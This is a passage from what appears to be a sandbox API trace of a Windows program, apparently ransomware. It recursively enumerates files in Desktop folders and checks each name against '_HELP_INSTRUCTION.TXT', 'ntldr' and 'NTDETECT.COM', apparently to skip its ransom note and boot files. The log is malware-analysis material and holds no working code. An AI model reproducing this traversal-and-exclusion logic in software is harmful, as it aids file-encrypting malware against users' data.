lpSrch="ntdetect.com") returned 0x0 [0035.530] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.530] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0035.530] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 1 [0035.530] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 0 [0035.530] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM" [0035.530] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*" [0035.530] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\", lpSrch="Desktop") returned="Desktop\\Ee7G-xHgdwJfqcsImMM\\" [0035.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x324c38 [0035.530] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0035.531] lstrcpyW (in: lpString1=0x17b644, lpString2="Ee7G-xHgdwJfqcsImMM" | out: lpString1="Ee7G-xHgdwJfqcsImMM") returned="Ee7G-xHgdwJfqcsImMM" [0035.531] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0035.531] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0035.531] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 1 [0035.531] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 0 [0035.531] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.531] lstrcmpW (lpString1="KZ7l4KmpPgbeETV_wvF", lpString2="..") returned 1 [0035.531] lstrcmpW (lpString1="KZ7l4KmpPgbeETV_wvF", lpString2=".") returned 1 [0035.531] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0035.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0035.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0035.531] SetErrorMode (uMode=0x1) returned 0x1 [0035.531] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0035.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.531] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0035.531] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x324c38 [0035.531] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0035.531] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.531] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.532] lstrcmpW (lpString1="5OmbcR7YDw3.bmp", lpString2="..") returned 1 [0035.532] lstrcmpW (lpString1="5OmbcR7YDw3.bmp", lpString2=".") returned 1 [0035.532] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.532] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="ntldr") returned 0x0 [0035.532] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="NTLDR") returned 0x0 [0035.532] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="NTDETECT.COM") returned 0x0 [0035.532] StrStrW (lpFirst="5OmbcR7YDw3.bmp", lpSrch="ntdetect.com") returned 0x0 [0035.532] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.532] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.532] lstrcmpW (lpString1="iyIk6.jpg", lpString2="..") returned 1 [0035.532] lstrcmpW (lpString1="iyIk6.jpg", lpString2=".") returned 1 [0035.532] StrStrW (lpFirst="iyIk6.jpg", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.532] StrStrW (lpFirst="iyIk6.jpg", lpSrch="ntldr") returned 0x0 [0035.532] StrStrW (lpFirst="iyIk6.jpg", lpSrch="NTLDR") returned 0x0 [0035.532] StrStrW (lpFirst="iyIk6.jpg", lpSrch="NTDETECT.COM") returned 0x0 [0035.532] StrStrW (lpFirst="iyIk6.jpg", lpSrch="ntdetect.com") returned 0x0 [0035.532] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.532] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.532] lstrcmpW (lpString1="rVKi.xlsx", lpString2="..") returned 1 [0035.532] lstrcmpW (lpString1="rVKi.xlsx", lpString2=".") returned 1 [0035.532] StrStrW (lpFirst="rVKi.xlsx", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.532] StrStrW (lpFirst="rVKi.xlsx", lpSrch="ntldr") returned 0x0 [0035.532] StrStrW (lpFirst="rVKi.xlsx", lpSrch="NTLDR") returned 0x0 [0035.532] StrStrW (lpFirst="rVKi.xlsx", lpSrch="NTDETECT.COM") returned 0x0 [0035.532] StrStrW (lpFirst="rVKi.xlsx", lpSrch="ntdetect.com") returned 0x0 [0035.532] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.532] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.532] lstrcmpW (lpString1="UcgnfCPkkGAfI8Infh.pdf", lpString2="..") returned 1 [0035.532] lstrcmpW (lpString1="UcgnfCPkkGAfI8Infh.pdf", lpString2=".") returned 1 [0035.532] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.532] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="ntldr") returned 0x0 [0035.532] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="NTLDR") returned 0x0 [0035.532] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="NTDETECT.COM") returned 0x0 [0035.532] StrStrW (lpFirst="UcgnfCPkkGAfI8Infh.pdf", lpSrch="ntdetect.com") returned 0x0 [0035.532] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.532] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.532] lstrcmpW (lpString1="XiCIIZYNum_VSBs.wav", lpString2="..") returned 1 [0035.532] lstrcmpW (lpString1="XiCIIZYNum_VSBs.wav", lpString2=".") returned 1 [0035.532] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.532] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="ntldr") returned 0x0 [0035.532] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="NTLDR") returned 0x0 [0035.533] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="NTDETECT.COM") returned 0x0 [0035.533] StrStrW (lpFirst="XiCIIZYNum_VSBs.wav", lpSrch="ntdetect.com") returned 0x0 [0035.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] lstrcmpW (lpString1="ZxQsBuyh.ods", lpString2="..") returned 1 [0035.533] lstrcmpW (lpString1="ZxQsBuyh.ods", lpString2=".") returned 1 [0035.533] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.533] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="ntldr") returned 0x0 [0035.533] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="NTLDR") returned 0x0 [0035.533] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="NTDETECT.COM") returned 0x0 [0035.533] StrStrW (lpFirst="ZxQsBuyh.ods", lpSrch="ntdetect.com") returned 0x0 [0035.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0035.533] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 1 [0035.533] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 0 [0035.533] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF" [0035.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*" [0035.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\", lpSrch="Desktop") returned="Desktop\\KZ7l4KmpPgbeETV_wvF\\" [0035.533] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x324c38 [0035.533] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0035.533] lstrcpyW (in: lpString1=0x17b644, lpString2="KZ7l4KmpPgbeETV_wvF" | out: lpString1="KZ7l4KmpPgbeETV_wvF") returned="KZ7l4KmpPgbeETV_wvF" [0035.533] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0035.533] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.533] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0035.533] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 1 [0035.534] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 0 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0035.534] lstrcmpW (lpString1="ZBiOZr_ 3-6W", lpString2="..") returned 1 [0035.534] lstrcmpW (lpString1="ZBiOZr_ 3-6W", lpString2=".") returned 1 [0035.534] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0035.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0035.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0035.534] SetErrorMode (uMode=0x1) returned 0x1 [0035.534] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0035.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0035.534] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\" [0035.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0035.534] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x324c38 [0035.534] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0035.534] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0035.534] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.534] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.534] lstrcmpW (lpString1="UzONnSwswGOnlESVfL.mp3", lpString2="..") returned 1 [0035.534] lstrcmpW (lpString1="UzONnSwswGOnlESVfL.mp3", lpString2=".") returned 1 [0035.534] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.534] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="ntldr") returned 0x0 [0035.534] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="NTLDR") returned 0x0 [0035.534] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="NTDETECT.COM") returned 0x0 [0035.535] StrStrW (lpFirst="UzONnSwswGOnlESVfL.mp3", lpSrch="ntdetect.com") returned 0x0 [0035.535] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0035.535] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.535] lstrcmpW (lpString1="xtxVVYFEc-NWjSwclj.flv", lpString2="..") returned 1 [0035.535] lstrcmpW (lpString1="xtxVVYFEc-NWjSwclj.flv", lpString2=".") returned 1 [0035.535] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.535] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="ntldr") returned 0x0 [0035.535] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="NTLDR") returned 0x0 [0035.535] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="NTDETECT.COM") returned 0x0 [0035.535] StrStrW (lpFirst="xtxVVYFEc-NWjSwclj.flv", lpSrch="ntdetect.com") returned 0x0 [0035.535] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0035.535] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.535] lstrcmpW (lpString1="zKa6.xls", lpString2="..") returned 1 [0035.535] lstrcmpW (lpString1="zKa6.xls", lpString2=".") returned 1 [0035.535] StrStrW (lpFirst="zKa6.xls", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0035.535] StrStrW (lpFirst="zKa6.xls", lpSrch="ntldr") returned 0x0 [0035.535] StrStrW (lpFirst="zKa6.xls", lpSrch="NTLDR") returned 0x0 [0035.535] StrStrW (lpFirst="zKa6.xls", lpSrch="NTDETECT.COM") returned 0x0 [0035.535] StrStrW (lpFirst="zKa6.xls", lpSrch="ntdetect.com") returned 0x0 [0035.535] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0035.535] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0035.535] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 1 [0035.535] FindClose (in: hFindFile=0x324c38 | out: hFindFile=0x324c38) returned 0 [0035.535] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0035.535] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*" [0035.535] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\", lpSrch="Desktop") returned="Desktop\\ZBiOZr_ 3-6W\\" [0035.535] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x324c38 [0035.535] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0035.535] lstrcpyW (in: lpString1=0x17b644, lpString2="ZBiOZr_ 3-6W" | out: lpString1="ZBiOZr_ 3-6W") returned="ZBiOZr_ 3-6W" [0035.535] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0035.535] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0035.535] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.535] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0035.535] FindNextFileW (in: hFindFile=0x324c38, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0035.536] lstrcmpW (lpString1="3Yo4kg3p-K", lpString2="..") returned 1 [0035.536] lstrcmpW (lpString1="3Yo4kg3p-K", lpString2=".") returned 1 [0035.536] lstrcpyW (in: lpString1=0x17c4d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W" [0035.536] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZBiOZr_ 3-6W", lpString2="\\" | out: 